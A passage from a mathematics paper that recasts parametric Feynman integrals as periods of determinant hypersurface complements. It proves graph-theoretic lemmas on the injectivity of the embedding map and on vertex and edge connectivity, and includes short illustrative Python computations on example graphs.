More precisely, we consider for each graph Γ as above, satisfying a transparent combinatorial condition (summarized at the beginning of §5), a normal crossings divisor $\hat\Sigma_\Gamma$ in the affine space $\mathbb{A}^{\ell^2}$ of ℓ × ℓ matrices. We observe that, modulo the issue of divergences, the parametric Feynman integral is a period of the pair $(\mathbb{A}^{\ell^2}\smallsetminus \hat D_\ell,\ \hat\Sigma_\Gamma\smallsetminus(\hat D_\ell\cap\hat\Sigma_\Gamma))$, where $\hat D_\ell$ is the determinant hypersurface. We then observe that all these normal crossings divisors $\hat\Sigma_\Gamma$ may be immersed into a fixed normal crossings divisor $\hat\Sigma_{\ell,g}$, determined by the number of loops ℓ and the embedding genus g; therefore, the question of whether Feynman integrals are periods of mixed Tate motives may be decided by verifying that the motive $m(\mathbb{A}^{\ell^2}\smallsetminus\hat D_\ell,\ \hat\Sigma_{\ell,g}\smallsetminus(\hat D_\ell\cap\hat\Sigma_{\ell,g}))$, whose realization is the relative cohomology of the corresponding pair, is mixed Tate. In fact, we show that verifying this assertion for g = 0 would suffice to deal with all graphs Γ with b₁(Γ) = ℓ (and satisfying our combinatorial condition), simultaneously for all genera. We approach this question by an inclusion-exclusion argument, reducing it to verifying that specific loci in $\mathbb{A}^{\ell^2}$ are mixed Tate (see §5.3). We carry out this verification for ℓ ≤ 3 loops (§6), showing that the motive $m(\mathbb{A}^9\smallsetminus\hat D_3,\ \hat\Sigma_{3,0}\smallsetminus(\hat D_3\cap\hat\Sigma_{3,0}))$ is mixed Tate. In doing so, we obtain explicit formulae for the class $[\hat\Sigma_{3,0}\smallsetminus(\hat D_3\cap\hat\Sigma_{3,0})]$ (corresponding to the 'wheel with three spokes') and for the classes of strata of the same locus, in the Grothendieck group of varieties. These classes may be assembled to construct the corresponding class for any graph with three loops (satisfying our combinatorial condition). This illustrates a simple case of our strategy: it follows that, modulo the issue of divergences, Feynman integrals of graphs with three or fewer loops are indeed periods of mixed Tate motives. Carrying out the same strategy for a larger number of loops is a worthwhile project.
Finally, in §7 we discuss the problem of regularization of divergent Feynman integrals, and how different possible regularizations can be made compatible with the approach via determinant hypersurfaces described here. We recall the basic notation and terminology we use in the following.
A scalar quantum field theory is specified by a Lagrangian of the form

(1.1) $\mathcal{L}(\phi) = \frac{1}{2}(\partial\phi)^2 - \frac{m^2}{2}\,\phi^2 + \mathcal{L}_{int}(\phi),$

where $\mathcal{L}_{int}(\phi)$ is a polynomial in φ of degree at least three.

Definition 1.1. A one particle irreducible (1PI) Feynman graph Γ of the theory is a finite connected graph with the following properties.
• The valence of each vertex is equal to the degree of one of the monomials in the Lagrangian (1.1).
• The set E(Γ) of edges of the graph is divided into internal and external edges, $E(\Gamma) = E_{int}(\Gamma) \cup E_{ext}(\Gamma)$. Each internal edge connects two vertices of the graph, while the external edges have only one vertex. (One thinks of an internal edge as being a union of two half-edges and an external one as being a single half-edge.)
• The graph cannot be disconnected by removing a single internal edge. This is the 1PI condition.
In the following we denote by n = #E int (Γ) the number of internal edges, by N = #E ext (Γ) the number of external edges, and by ℓ = b 1 (Γ) the number of loops.
In their parametric form, the Feynman integrals of massless perturbative scalar quantum field theories (cf. §6-2-3 of [22], §18 of [7], and §6 of [27]) are integrals of the form

(1.2) $U(\Gamma, p) = \frac{\Gamma(n - D\ell/2)}{(4\pi)^{\ell D/2}} \int_{\sigma_n} \frac{P_\Gamma(t,p)^{-n+D\ell/2}\,\omega_n}{\Psi_\Gamma(t)^{-n+(\ell+1)D/2}},$

where Γ(n − Dℓ/2) is a possibly divergent Γ-factor, σ_n is the simplex

(1.3) $\sigma_n = \{ t = (t_1, \dots, t_n) \in \mathbb{R}_+^n \,:\, \textstyle\sum_i t_i = 1 \},$

and the polynomials $\Psi_\Gamma(t)$ and $P_\Gamma(t, p)$ are obtained from the combinatorics of the graph, respectively as

(1.4) $\Psi_\Gamma(t) = \sum_{T \subset \Gamma} \prod_{e \notin E(T)} t_e,$

where the sum is over all the spanning trees T of Γ, and

(1.5) $P_\Gamma(t, p) = \sum_{C \subset \Gamma} s_C \prod_{e \in C} t_e,$

where the sum is over the cut-sets C ⊂ Γ, i.e. the collections of b₁(Γ) + 1 internal edges that divide the graph Γ in exactly two connected components Γ₁ ∪ Γ₂. The coefficient $s_C$ is a function of the external momenta attached to the vertices in either one of the two components,

(1.6) $s_C = \Big( \sum_{v \in V(\Gamma_1)} P_v \Big)^2 = \Big( \sum_{v \in V(\Gamma_2)} P_v \Big)^2.$

Here the $P_v$ are defined as

(1.7) $P_v = \sum_{e \in E_{ext}(\Gamma),\ t(e) = v} p_e,$

where the $p_e$ are incoming external momenta attached to the external edges of Γ and satisfying the conservation law

(1.8) $\sum_{e \in E_{ext}(\Gamma)} p_e = 0.$
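As a concrete illustration of (1.4) (not taken from the paper), the sketch below enumerates the spanning trees of a small example graph, two triangles glued along an edge (n = 5 internal edges, ℓ = 2 loops), and assembles the corresponding graph polynomial; the graph and variable names are our own choices.

```python
# Psi_Gamma(t): sum over spanning trees of the product of the edge
# variables NOT in the tree, per Eq. (1.4).
from itertools import combinations

import networkx as nx
import sympy as sp

edges = [(0, 1), (1, 2), (2, 0), (1, 3), (3, 2)]
t = sp.symbols(f"t0:{len(edges)}")

G = nx.Graph(edges)
tree_size = G.number_of_nodes() - 1      # a spanning tree has |V| - 1 edges
psi = sp.Integer(0)
for subset in combinations(range(len(edges)), tree_size):
    T = nx.Graph([edges[i] for i in subset])
    if T.number_of_nodes() == G.number_of_nodes() and nx.is_tree(T):
        psi += sp.Mul(*[t[i] for i in range(len(edges)) if i not in subset])
print(sp.expand(psi))                    # homogeneous of degree b1(Gamma) = 2
```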
In order to work with algebraic differential forms defined over ℚ, we assume that the external momenta also take rational values, $p_e \in \mathbb{Q}^D$. Ignoring the Γ-function factor in (1.2), one is interested in understanding what kind of period is computed by the integral

(1.9) $\int_{\sigma_n} \frac{P_\Gamma(t,p)^{-n+D\ell/2}\,\omega_n}{\Psi_\Gamma(t)^{-n+(\ell+1)D/2}}.$
In quantum field theory one can consider the same physical theory (with specified Lagrangian) in different spacetime dimensions D ∈ ℕ. In fact, one should think of the dimension D as one of the variable parameters in the problem. For the purposes of this paper, we work in the range where D is sufficiently large, so that n ≤ Dℓ/2. The case n = Dℓ/2 is the log divergent case, where the integral (1.9) simplifies to the form

(1.10) $\int_{\sigma_n} \frac{\omega_n}{\Psi_\Gamma(t)^{D/2}}.$

Another case where the Feynman integral has the simpler form (1.10), even for graphs that do not necessarily satisfy the log divergence condition n = Dℓ/2, is when one considers nonzero mass m ≠ 0 but external momenta set equal to zero. In such cases, the parametric Feynman integral becomes of the form

(1.11) $\frac{\Gamma(n - D\ell/2)}{(4\pi)^{\ell D/2}}\, m^{D\ell - 2n} \int_{\sigma_n} \frac{\omega_n}{\Psi_\Gamma(t)^{D/2}}.$

In the following we assume that we are either in the massless case (1.9), in the range of dimensions D satisfying n ≤ Dℓ/2, or in the massive case with zero external momenta (1.11), in arbitrary dimension.
A first issue one needs to clarify in addressing the question of Feynman integrals and periods is the fact that the integral (1.9) is often divergent. Divergences are contributed by the intersection $\sigma_n \cap \hat X_\Gamma$, with $\hat X_\Gamma = \{ t \in \mathbb{A}^n \,|\, \Psi_\Gamma(t) = 0 \}$, which is often non-empty. Although there are cases where a nonempty intersection $\sigma_n \cap \hat X_\Gamma$ may still give rise to an absolutely convergent integral, hence a period, these are relatively rare cases, and usually some regularization and renormalization procedure is needed to eliminate the divergences over the locus where the domain of integration meets the graph hypersurface. Notice that these intersections only occur on the boundary $\partial\sigma_n$, since in the interior of $\sigma_n$ the polynomial $\Psi_\Gamma(t)$ is strictly positive (see (1.4)).
Our results will apply directly to all cases where the integral is convergent, while we discuss in Section 7 the case where a regularization procedure is required to treat divergences in the Feynman integrals. The main question is then, more precisely formulated, whether it is true that the numbers obtained by computing such integrals (after removing a possibly divergent Gamma factor, and after regularization and renormalization when needed) are always periods of mixed Tate motives.
The main contribution of this paper is the reformulation of the problem, where instead of working with the graph hypersurfaces X Γ defined by the vanishing of the graph polynomial Ψ Γ , one works with the complement of a fixed determinant hypersurface in an affine space of matrices. This allows us to reduce the problem to one that only depends on the number of loops of the graph, at least for the class of graphs satisfying the combinatorial condition discussed in §2 (for example, 3-vertex connected planar graphs with ℓ loops). We propose specific questions in terms of ℓ alone, in §5.3; these questions may be appreciated independently of our motivation, as they do not refer directly to Feynman graphs. We hope that these reformulations might help to connect the problem to other interesting questions, such as the geometry of intersections of Schubert cells and Kazhdan-Lusztig theory.
2. Feynman parameters and determinants
With the notation as above, for a given Feynman graph Γ, the graph hypersurface $X_\Gamma$ is defined as the locus of zeros

(2.1) $X_\Gamma = \{ t \in \mathbb{P}^{n-1} \,:\, \Psi_\Gamma(t) = 0 \}.$

Indeed, $\Psi_\Gamma$ is homogeneous of degree ℓ, hence it defines a hypersurface of degree ℓ in the projective space $\mathbb{P}^{n-1}$. We will also consider the affine cone on $X_\Gamma$, namely the affine hypersurface

(2.2) $\hat X_\Gamma = \{ t \in \mathbb{A}^n \,:\, \Psi_\Gamma(t) = 0 \}.$

The question of whether the Feynman integral is a period of a mixed Tate motive can be approached (modulo the divergence problem) as a question on whether the relative cohomology

(2.3) $H^{n-1}(\mathbb{P}^{n-1} \smallsetminus X_\Gamma,\ \Sigma_n \smallsetminus (\Sigma_n \cap X_\Gamma))$

is a realization of a mixed Tate motive, where $\Sigma_n$ is the algebraic simplex

(2.4) $\Sigma_n = \{ t \in \mathbb{P}^{n-1} \,:\, \textstyle\prod_i t_i = 0 \},$

i.e. the union of the coordinate hyperplanes, containing the boundary of the domain of integration $\partial\sigma_n \subset \Sigma_n$. See for instance [10], [9]. Although working in the projective setting is very natural (see [10]), there are several reasons why it may be preferable to consider affine hypersurfaces:
• Only in the limit cases of a massless theory, or of zero external momenta in the massive case, does the parametric Feynman integral involve the quotient of two homogeneous polynomials ([7], §18).
• The deformations of the φ⁴ quantum field theory to noncommutative spacetime, which have been the focus of much recent research (see e.g. [20]), show that even in the massless case the graph polynomials $\Psi_\Gamma$ and $P_\Gamma$ are no longer homogeneous in the noncommutative setting, and only in the commutative limit do they recover this property (see [21], [23]).
• As shown in [2], in the affine setting the graph hypersurface complement satisfies a multiplicative property over disjoint unions of graphs that makes it possible to define algebro-geometric and motivic Feynman rules. For these various reasons, in this paper we primarily work in the affine rather than in the projective setting.
In the present paper, we approach the problem in a different way: instead of working with the hypersurface $\hat X_\Gamma$, we map the Feynman integral computation and the graph hypersurface into a larger hypersurface $\hat D_\ell$ inside a larger affine space, so that we will be dealing with a relative cohomology replacing (2.3), in which the ambient space (the hypersurface complement) only depends on the number of loops of the graph.
2.1. Determinant hypersurfaces and graph polynomials. We now show that all the affine varieties $\hat X_\Gamma$, for a fixed number of loops ℓ, map naturally to a larger hypersurface in a larger affine space, by realizing the polynomial $\Psi_\Gamma$ for the given graph as a pullback of a fixed polynomial $\Psi_\ell$ in ℓ² variables.
Recall that the determinant hypersurface $D_\ell$ is defined in the following way. Let $k[x_{kr},\ k, r = 1, \dots, \ell]$ be the polynomial ring in ℓ² variables and set

(2.5) $\hat D_\ell = \{ x = (x_{kr}) \in \mathbb{A}^{\ell^2} \,:\, \Psi_\ell(x) := \det(x_{kr}) = 0 \}.$

Since the determinant $\Psi_\ell$ is a homogeneous polynomial, this in particular also defines a projective hypersurface $D_\ell$ in $\mathbb{P}^{\ell^2 - 1}$. We will however mostly concentrate on the affine hypersurface $\hat D_\ell \subset \mathbb{A}^{\ell^2}$ defined by the vanishing of the determinant, i.e. the cone in $\mathbb{A}^{\ell^2}$ of the projective hypersurface $D_\ell$. Suppose given any Feynman graph Γ with $b_1(\Gamma) = \ell$ and $\#E_{int}(\Gamma) = n$. It is well known (see e.g. §18 of [7]) that the graph polynomial $\Psi_\Gamma(t)$ can be equivalently written in the form of a determinant

(2.6) $\Psi_\Gamma(t) = \det M_\Gamma(t),$

(2.7) $(M_\Gamma(t))_{kr} = \sum_i t_i\, \eta_{ik}\, \eta_{ir},$

where the n × ℓ matrix $\eta_{ik}$ is defined in terms of the edges $e_i \in E(\Gamma)$ and a choice of a basis for the first homology group, $l_k \in H_1(\Gamma, \mathbb{Z})$, with $k = 1, \dots, \ell = b_1(\Gamma)$, by setting

(2.8) $\eta_{ik} = \begin{cases} +1 & \text{edge } e_i \in \text{loop } l_k, \text{ same orientation,} \\ -1 & \text{edge } e_i \in \text{loop } l_k, \text{ reverse orientation,} \\ 0 & \text{otherwise.} \end{cases}$
The determinant $\det M_\Gamma(t)$ is independent both of the choice of orientation on the edges of the graph and of the choice of generators for $H_1(\Gamma, \mathbb{Z})$. The expression of the matrix $M_\Gamma(t)$ defines a linear map $\tau: \mathbb{A}^n \to \mathbb{A}^{\ell^2}$ of the form

(2.9) $\tau(t_1, \dots, t_n) = \Big( \sum_i t_i\, \eta_{ik}\, \eta_{ir} \Big)_{k, r = 1, \dots, \ell}.$

We can write this equivalently in the shorter form

(2.10) $\tau(t) = \eta^\dagger\, \Lambda\, \eta,$

where Λ is the diagonal n × n matrix with $t_1, \dots, t_n$ as diagonal entries, and $\eta = \eta_\Gamma$ is the matrix (2.8).
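Continuing the same example, the following sketch is a hedged illustration of (2.6)-(2.10): it builds the incidence matrix η of (2.8) for one admissible choice of loop basis (the two triangular faces, both oriented counterclockwise), forms $M_\Gamma(t) = \eta^\dagger \Lambda \eta$, and checks that its determinant reproduces the spanning-tree polynomial computed above.

```python
# det(eta^T Lambda eta) for the two-triangle example graph.
import sympy as sp

t = sp.symbols("t0:5")
# rows: edges (0,1),(1,2),(2,0),(1,3),(3,2); columns: the two face loops
eta = sp.Matrix([
    [1,  0],
    [1, -1],   # the shared edge lies in both loops, with opposite sign
    [1,  0],
    [0,  1],
    [0,  1],
])
M = eta.T * sp.diag(*t) * eta   # the 2 x 2 matrix M_Gamma(t) of (2.7)
print(sp.expand(M.det()))       # equals Psi_Gamma(t) computed above
```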
Then by construction we have that $\hat X_\Gamma = \tau^{-1}(\hat D_\ell)$, from (2.6). We formalize this as follows:

Lemma 2.1. Let Γ be a Feynman graph with n internal edges and ℓ loops. Let $\hat X_\Gamma \subset \mathbb{A}^n$ denote the affine cone on the projective hypersurface $X_\Gamma \subset \mathbb{P}^{n-1}$. Then

$\hat X_\Gamma = \tau^{-1}(\hat D_\ell),$

where $\tau: \mathbb{A}^n \to \mathbb{A}^{\ell^2}$ is a linear map depending on Γ.
The next lemma, which follows directly from the definitions, details some of the properties of the map τ introduced above that we will be using in the following.
Lemma 2.2. The matrix $M_\Gamma(t) = \eta^\dagger \Lambda \eta$ has the following properties:
• For i = j, the corresponding diagonal entry is the sum of the variables $t_k$ of the edges belonging to the i-th loop.
• For i ≠ j, the corresponding entry is the sum of $\pm t_k$, where the $t_k$ correspond to the edges common to the i-th and j-th loop, and the sign is +1 if the orientations of the edges both agree or both disagree with the loop orientations, and −1 otherwise.

When the map τ constructed above is injective, it is possible to rephrase the computation of the parametric Feynman integral (1.9) as a period of the complement of the determinant hypersurface $\hat D_\ell \subset \mathbb{A}^{\ell^2}$.

Lemma 2.3. Assume that the map $\tau: \mathbb{A}^n \to \mathbb{A}^{\ell^2}$ of (2.10) is injective. Then the integral (1.9) can be rewritten in the form

$\int_{\tau(\sigma_n)} \frac{P_\Gamma(p,x)^{-n+D\ell/2}\,\omega_\Gamma(x)}{\det(x)^{-n+(\ell+1)D/2}},$

where $P_\Gamma(p, x)$ is a homogeneous polynomial on $\mathbb{A}^{\ell^2}$ whose restriction to the image of $\mathbb{A}^n$ under the map τ agrees with $P_\Gamma(p, t)$, and $\omega_\Gamma$ is the induced volume form.
Proof. It is possible to regard the polynomial $P_\Gamma(p, t)$ as the restriction to $\mathbb{A}^n$ of a homogeneous polynomial $P_\Gamma(p, x)$ defined on all of $\mathbb{A}^{\ell^2}$. Clearly, such a $P_\Gamma(p, x)$ will not be unique, but different choices of $P_\Gamma(p, x)$ will not affect the integral calculation, which takes place entirely inside the linear subspace $\mathbb{A}^n$. The simplex $\sigma_n$ is also linearly embedded inside $\mathbb{A}^{\ell^2}$, and we denote its image by $\tau(\sigma_n)$. The volume form $\omega_n$ can also be identified, under such a choice of coordinates in $\mathbb{A}^{\ell^2}$, with a form $\omega_\Gamma(x)$ induced on the image, via a choice of an $(\ell^2 - n)$-frame $\xi_\Gamma$ associated to the linear subspace $\tau(\mathbb{A}^n) \subset \mathbb{A}^{\ell^2}$. Notice in particular that if the map τ is injective then one has a well defined map $\mathbb{P}^{n-1} \to \mathbb{P}^{\ell^2-1}$, which is otherwise not everywhere defined.
We are interested in the following, heuristically formulated, consequence of Lemma 2.3: modulo the issue of divergences, the parametric Feynman integral (1.9) is a period of the pair $(\mathbb{A}^{\ell^2} \smallsetminus \hat D_\ell,\ \hat\Sigma_\Gamma \smallsetminus (\hat D_\ell \cap \hat\Sigma_\Gamma))$, for a normal crossings divisor $\hat\Sigma_\Gamma$ containing $\tau(\partial\sigma_n)$.
The explicit construction of the normal crossings divisor $\hat\Sigma_\Gamma$ is given in Lemma 5.1 below. We will further improve on this observation by reformulating it in a way that will only depend on the number of loops ℓ of Γ and on its genus, and not on the specific graph Γ. To this purpose, we will determine subsets of $\mathbb{A}^{\ell^2}$ which will contain the components of the image $\tau(\partial\sigma_n)$ of the boundary of the simplex in $\mathbb{A}^n$, independently of Γ (see §3.4).
In any case, this type of results motivates us to determine conditions on the Feynman graph Γ which ensure that the corresponding map τ : A n → A ℓ 2 is injective.
3. Graph theoretic conditions for embeddings

3.1. Injectivity of τ. In the following, we denote by $\tau_i$ the composition of the map τ of (2.10) with the projection to the i-th row of the matrix $\eta^\dagger \Lambda \eta$, viewed as a map of the variables corresponding only to the edges that belong to the i-th loop in the chosen basis of the first homology of the graph Γ.
We first make the following simple observation.
Lemma 3.1. If τ i is injective for i ranging over a set of loops such that every edge of Γ is part of a loop in that set, then τ is itself injective.
Proof. Let (t 1 , . . . , t n ) = (c 1 , . . . , c n ) be in the kernel of τ . Since each (i, j) entry in the target matrix is a combination of edges in the i-th loop, the map τ i must send to zero the tuple of c j 's corresponding to the edges in the i-th loop. Since we are assuming τ i to be injective, that tuple is the zero-tuple. Since every edge is in some loop for which τ i is injective, it follows that every c j is zero, as needed.
The properties detailed in Lemma 2.2 immediately provide a sufficient condition for the maps $\tau_i$ to be injective.

Lemma 3.2. Let $\ell_i$ be a loop of Γ such that each of its edges, except possibly one, is the unique edge in common between $\ell_i$ and some other loop of the chosen basis. Then the map $\tau_i$ is injective.

Proof. In this situation, all but at most one edge variable appear by themselves as an entry of the i-th row, and the possible last remaining variable appears summed together with the other variables. More explicitly, if $t_{i_1}, \dots, t_{i_v}$ are the variables corresponding to the edges of a loop $\ell_i$, up to rearranging the entries in the corresponding row of $\eta^\dagger \Lambda \eta$ and neglecting other entries, the map $\tau_i$ is given by

$(t_{i_1}, \dots, t_{i_v}) \mapsto (t_{i_1} + \cdots + t_{i_v},\ \pm t_{i_1}, \dots, \pm t_{i_v})$

if $\ell_i$ has no edge not in common with any other loop, and

$(t_{i_1}, \dots, t_{i_v}) \mapsto (t_{i_1} + \cdots + t_{i_v},\ \pm t_{i_1}, \dots, \pm t_{i_{v-1}})$

if $\ell_i$ has a single edge $t_{i_v}$ not in common with any other loop. In either case the map $\tau_i$ is injective, as claimed.

Now we need a sufficiently natural combinatorial condition on the graph Γ that ensures that the conditions of Lemma 3.2 and Lemma 3.1 are fulfilled. We first recall some useful facts about graphs and embeddings of graphs on surfaces which we need in the following.
Every (finite) graph Γ may be embedded in a compact orientable surface of finite genus. The minimum genus of an orientable surface in which Γ may be embedded is the genus of Γ. Thus, Γ is planar if and only if it may be embedded in a sphere, if and only if its genus is 0. An embedding ι: Γ ↪ S is a 2-cell embedding if every face is homeomorphic to an open 2-cell, and a closed 2-cell embedding if, moreover, the closure of every face is homeomorphic to a closed 2-cell. It is known that an embedding of a connected graph of minimal genus is necessarily a 2-cell embedding ([26], Proposition 3.4.1 and Theorem 3.2.4). We discuss below conditions on the existence of closed 2-cell embeddings, cf. [26], §5.5.
For our purposes, the advantage of having a closed 2-cell embedding for a graph Γ is that the faces of such an embedding determine a choice of loops of Γ, by taking the boundaries of the 2-cells of the embedding together with a basis of generators for the homology of the Riemann surface in which the graph is embedded.

Lemma 3.4. Let ι: Γ ↪ S be a closed 2-cell embedding into an orientable surface S of genus g, with f faces. Then any f − 1 of the loops determined by the boundaries of the faces, together with 2g loops generating $H_1(S, \mathbb{Z})$, form a basis of $H_1(\Gamma, \mathbb{Z})$; in particular, ℓ = b₁(Γ) = 2g + f − 1.

Proof. Orient (arbitrarily) the edges of Γ and the faces, and then add the edges on the boundary of each face with sign determined by the orientations. The fact that the closure of each face is a 2-disk guarantees that the boundary is null-homotopic. This produces a number of loops equal to the number f of faces. It is clear that these f loops are not independent: the sum of any f − 1 of them must equal the remaining one, up to sign. Any f − 1 loops, however, will be independent in $H_1(\Gamma)$. Indeed, these f − 1 loops, together with 2g generators of the homology of S, generate $H_1(\Gamma)$. The homology group $H_1(\Gamma)$ has rank 2g + f − 1, as one can see from the Euler characteristic formula

$2 - 2g = \chi(S) = \#V(\Gamma) - \#E(\Gamma) + f,$

so that $b_1(\Gamma) = \#E(\Gamma) - \#V(\Gamma) + 1 = 2g + f - 1$, and there will be no other relations.
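As a quick numerical check of the count ℓ = 2g + f − 1, the snippet below verifies it for the 'wheel with three spokes' (mentioned in the abstract; an example of our choosing) in its planar embedding:

```python
# Wheel with three spokes, planar (g = 0) embedding: V = 4, E = 6.
V, E, g = 4, 6, 0
f = 2 - 2 * g - V + E        # number of faces, from chi(S) = V - E + f
b1 = E - V + 1               # first Betti number (loop number) of the graph
print(b1 == 2 * g + f - 1)   # True: 3 = 2*0 + 4 - 1
```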
One refers to the chosen one among the f faces as the "external face" and the remaining f − 1 faces as the "internal faces".
Thus, given a closed 2-cell embedding ι: Γ ↪ S, we can use a basis of $H_1(\Gamma, \mathbb{Z})$ constructed as in Lemma 3.4 to compute the map τ of (2.10) and the maps $\tau_i$. We then have the following result.

Lemma 3.5. Let ι: Γ ↪ S be a closed 2-cell embedding, with loops chosen as in Lemma 3.4. Assume that: (1) any two of the faces have at most one edge in common; (2) every edge of Γ is in the boundary of two distinct faces. Then the maps $\tau_i$ corresponding to the internal faces, and hence the map τ, are injective.

Proof. The injectivity of the f − 1 maps $\tau_i$ follows from Lemma 3.2. If ℓ is a loop determined by an internal face, the variables corresponding to edges in common between ℓ and any other internal loop will appear as (±) individual entries on the row corresponding to ℓ.
Since ℓ has at most one edge in common with the external region, this accounts for all but at most one of the edges in ℓ. By Lemma 3.2, the injectivity of $\tau_i$ follows. Finally, as shown in Lemma 3.1, the map τ is injective if every edge is in one of the f − 1 loops and the f − 1 maps $\tau_i$ are injective. The stated condition guarantees that each edge appears in the loops corresponding to the faces separated by that edge. At least one of them is internal, so that every edge is accounted for.

Example 3.6. Consider the example of the planar graph in Figure 1. The conditions stated in Lemma 3.5 are evidently satisfied. Edges are marked by circled numbers. The loop corresponding to region 1 consists of edges 1, 2, 3, 4. The corresponding row of $\eta^\dagger \Lambda \eta$ is $(t_1 + t_2 + t_3 + t_4,\ \pm t_4,\ \pm t_3,\ \pm t_2,\ \pm t_1)$. Region 2 consists of edges 4, 5, 6, 7. Edge 7 is not in any other internal region. The corresponding row of $\eta^\dagger \Lambda \eta$ is $(t_4 + t_5 + t_6 + t_7,\ \pm t_4,\ \pm t_5,\ \pm t_6)$.
These maps are injective, as claimed. Given the symmetry of the situation, it is clear that all maps τ i (and hence τ as well) are injective for this graph, as guaranteed by Lemma 3.5.
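Since τ is linear in t, its injectivity is equivalent to a rank condition on the $\ell^2 \times n$ matrix whose k-th column is the vectorization of $\tau(e_k)$. The sketch below performs this check for the wheel with three spokes, with the loop basis given by its three internal planar faces; this is an illustrative substitute for the graph of Figure 1, which is not reproduced in this text.

```python
# Injectivity of tau as a rank test: tau(e_k) = eta_k eta_k^T, where
# eta_k is the k-th row of eta; tau is injective iff the stacked
# vectorizations have rank n.
import numpy as np

eta = np.array([
    [ 1,  0, -1],   # spoke (0,1)
    [-1,  1,  0],   # spoke (0,2)
    [ 0, -1,  1],   # spoke (0,3)
    [ 1,  0,  0],   # rim (1,2)
    [ 0,  1,  0],   # rim (2,3)
    [ 0,  0,  1],   # rim (3,1)
], dtype=float)
n = eta.shape[0]
cols = [np.outer(eta[k], eta[k]).ravel() for k in range(n)]  # vec(tau(e_k))
print(np.linalg.matrix_rank(np.column_stack(cols)) == n)     # True: injective
```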
The considerations that follow will allow us to improve on Lemma 3.5, by showing that in natural situations the second condition listed in Lemma 3.5 is automatically satisfied.
3.2. Connectivity of graphs. In this section we review some notions on connectivity for graphs, both for contextual reasons, since these notions relate well with conditions that are natural from the physical point of view, and in order to improve the results obtained above.
Given a graph Γ and a vertex v ∈ V(Γ), the graph Γ∖v is the graph with vertex set V(Γ)∖{v} and edge set E(Γ)∖{e : v ∈ ∂(e)}, i.e. the graph obtained by removing from Γ the star of the vertex v. It is customary to refer to Γ∖v simply as "the graph obtained by removing the vertex v", even though one in fact removes also all the edges adjacent to v.
There are two different notions of connectivity for graphs. To avoid confusion, we refer to them here as k-edge-connectivity and k-vertex-connectivity. For the notion of k-vertex connectivity we follow [26] p.11, though in our notation graphs include the case of multigraphs.
Definition 3.7. The notions of k-edge-connectivity and k-vertex-connectivity are defined as follows:
• A graph is k-edge-connected if it cannot be disconnected by removal of any set of k − 1 (or fewer) edges.
• A graph is 2-vertex-connected if it has no looping edges, it has at least 3 vertices, and it cannot be disconnected by removal of a single vertex, where vertex removal is defined as above.
• For k ≥ 3, a graph is k-vertex-connected if it has no looping edges and no multiple edges, it has at least k + 1 vertices, and it cannot be disconnected by removal of any set of k − 1 vertices.

[Figure 2. A splitting of a graph Γ at a vertex v.]

Thus, 1-vertex-connected and 1-edge-connected simply mean connected, while 2-edge-connected is the one-particle-irreducible (1PI) condition recalled in Definition 1.1. To see how the condition of 2-vertex-connectivity relates to the physical 1PI condition, we first recall the notion of splitting of a vertex in a graph Γ (cf. [26], §4.2).
Definition 3.8. A splitting of a graph Γ at a vertex v is the graph Γ′ obtained by partitioning the set of edges adjacent to v into two disjoint non-empty subsets E₁ and E₂, replacing v with two vertices v₁ and v₂, and inserting a new edge e to whose end vertices v₁ and v₂ the edges in the two sets E₁ and E₂ are respectively attached (see Figure 2).
We have the following relations between 2-vertex-connectivity and 2-edge-connectivity (1PI). The first observation will be needed in the proof of Proposition 3.13; the second is offered mostly for contextual reasons.

Lemma 3.9. Let Γ be a graph with at least 3 vertices and no looping edges. (1) If Γ is 2-vertex-connected, then Γ is 2-edge-connected (1PI). (2) Γ is 2-vertex-connected if and only if all the splittings of Γ at its vertices are 1PI.

Proof. (1): We have to show that, for a graph Γ with at least 3 vertices and no looping edges, 2-vertex-connectivity implies 2-edge-connectivity. Assume that Γ is not 1PI. Then there exists an edge e such that Γ∖e has two connected components Γ₁ and Γ₂. Since Γ has no looping edges, e has two distinct endpoints v₁ and v₂, which belong to the two different components after the edge removal. Since Γ has at least 3 vertices, at least one of the two components contains at least two vertices. Assume then that there exists v ≠ v₁ in V(Γ₁). Then, after the removal of the vertex v₁ from Γ, the vertices v and v₂ belong to different connected components, so that Γ is not 2-vertex-connected.
(2): We need to show that 2-vertex-connectivity is equivalent to all splittings Γ′ being 1PI. Suppose first that Γ is not 2-vertex-connected. Since Γ has at least 3 vertices and no looping edges, the failure of 2-vertex-connectivity means that there exists a vertex v whose removal disconnects the graph. Let V ⊂ V(Γ) be the set of vertices other than v that are endpoints of the edges adjacent to v. This set is a union V = V₁ ∪ V₂, where the vertices in the two subsets Vᵢ are contained in at least two different connected components of Γ∖v. Then the splitting Γ′ of Γ at v obtained by inserting an edge e such that the endpoints v₁ and v₂ are connected by edges, respectively, to the vertices in V₁ and V₂ is not 1PI.
Conversely, assume that there exists a splitting Γ ′ of Γ at a vertex v that is not 1PI. There exists an edge e of Γ ′ whose removal disconnects the graph. If e already belonged to Γ, then Γ would not be 1PI (and hence not 2-vertex connected, by (1)), as removal of e would disconnect it. So e must be the edge added in the splitting of Γ at the vertex v.
Let v₁ and v₂ be the endpoints of e. None of the other edges adjacent to v₁ or v₂ is a looping edge, by hypothesis; therefore there exist at least two further vertices, v′₁ adjacent to v₁ and v′₂ adjacent to v₂, lying on opposite sides of e. Since v′₁ and v′₂ are in Γ∖v, and Γ∖v is contained in Γ′∖e, it follows that removing v from Γ would also disconnect the graph. Thus Γ is not 2-vertex-connected.
The first statement in Lemma 3.9 admits the following analog for 3-connectivity.
Lemma 3.10. Let Γ be a graph with at least 4 vertices, with no looping edges and no multiple edges. Then 3-vertex-connectivity implies 3-edge-connectivity.
Proof. We argue by contradiction. Assume that Γ is 3-vertex-connected but not 2PI. We know it is 1PI because of the previous lemma. Thus, there exist two edges e 1 and e 2 such that the removal of both edges is needed to disconnect the graph. Since we are assuming that Γ has no multiple or looping edges, the two edges have at most one end in common.
Suppose first that they have a common endpoint v. Let v₁ and v₂ denote the remaining two endpoints, vᵢ ∈ ∂eᵢ, v₁ ≠ v₂. If the vertices v₁ and v₂ belong to different connected components after removing e₁ and e₂, then the removal of the vertex v disconnects the graph, so that Γ is not 3-vertex-connected (in fact not even 2-vertex-connected). If v₁ and v₂ belong to the same connected component, then v must be in a different component. Since the graph has at least 4 vertices and no multiple or looping edges, there exists at least another edge attached to either v, v₁, or v₂; let w denote its other endpoint. If w is adjacent to v, then removing v and v₁ leaves v₂ and w in different connected components. Similarly, if w is adjacent to (say) v₁, then the removal of the two vertices v₁ and v₂ leaves v and w in two different connected components. Hence Γ is not 3-vertex-connected.
